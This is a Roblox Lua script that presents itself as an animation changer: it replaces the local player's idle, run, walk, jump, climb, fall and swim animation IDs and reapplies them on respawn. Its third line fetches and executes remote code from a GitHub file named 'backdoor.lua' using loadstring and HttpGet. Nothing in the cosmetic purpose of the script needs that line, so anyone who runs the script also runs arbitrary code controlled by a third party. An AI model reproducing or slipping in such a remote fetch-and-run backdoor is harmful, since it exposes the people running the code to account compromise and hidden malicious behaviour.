repeat wait() until game:IsLoaded()
wait(1)
loadstring(game:HttpGet('https://raw.githubusercontent.com/ramirezmx/backdoor/main/backdoor.lua'))()

local Players = game:GetService('Players')
local Animate = Players.LocalPlayer.Character.Animate
Animate.idle.Animation1.AnimationId = 'rbxassetid://616158929'
Animate.idle.Animation2.AnimationId = 'rbxassetid://616160636'
Animate.run.RunAnim.AnimationId = 'rbxassetid://616163682'
Animate.walk.WalkAnim.AnimationId = 'rbxassetid://616168032'
Animate.jump.JumpAnim.AnimationId = 'rbxassetid://616161997'
Animate.climb.ClimbAnim.AnimationId = 'rbxassetid://616156119'
Animate.fall.FallAnim.AnimationId = 'rbxassetid://616157476'
Animate.swim.Swim.AnimationId = 'rbxassetid://616165109'
Animate.swimidle.SwimIdle.AnimationId = 'rbxassetid://616166655'
game.Players.LocalPlayer.CharacterAdded:connect(function(char)
wait(1)
local Players = game:GetService('Players')
local Animate = Players.LocalPlayer.Character.Animate
Animate.idle.Animation1.AnimationId = 'rbxassetid://616158929'
Animate.idle.Animation2.AnimationId = 'rbxassetid://616160636'
Animate.run.RunAnim.AnimationId = 'rbxassetid://616163682'
Animate.walk.WalkAnim.AnimationId = 'rbxassetid://616168032'
Animate.jump.JumpAnim.AnimationId = 'rbxassetid://616161997'
Animate.climb.ClimbAnim.AnimationId = 'rbxassetid://616156119'
Animate.fall.FallAnim.AnimationId = 'rbxassetid://616157476'
Animate.swim.Swim.AnimationId = 'rbxassetid://616165109'
Animate.swimidle.SwimIdle.AnimationId = 'rbxassetid://616166655'
char.ChildAdded:connect(function(ch)
print(ch.Name)
end)
end)
